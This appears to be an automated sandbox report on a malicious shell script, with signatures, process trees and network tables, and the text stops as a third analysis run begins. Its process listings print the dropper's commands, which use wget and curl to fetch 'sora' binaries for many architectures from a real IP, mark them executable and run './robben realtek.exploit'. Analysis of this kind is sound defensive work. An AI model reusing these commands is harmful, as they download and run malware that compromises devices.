Analysis Overview
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
Threat Level: Shows suspicious behavior
The file bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 195.181.164.19:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.39:443 | 1527653184.rsc.cdn77.org | tcp |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
debian9-armhf-20240418-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
memory/760-1-0xb671b000-0xb672c044-memory.dmp
memory/801-2-0xb66b5000-0xb66c6044-memory.dmp
memory/828-3-0xb6734000-0xb6745044-memory.dmp
memory/828-4-0xb669a000-0xb66ab044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
83s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
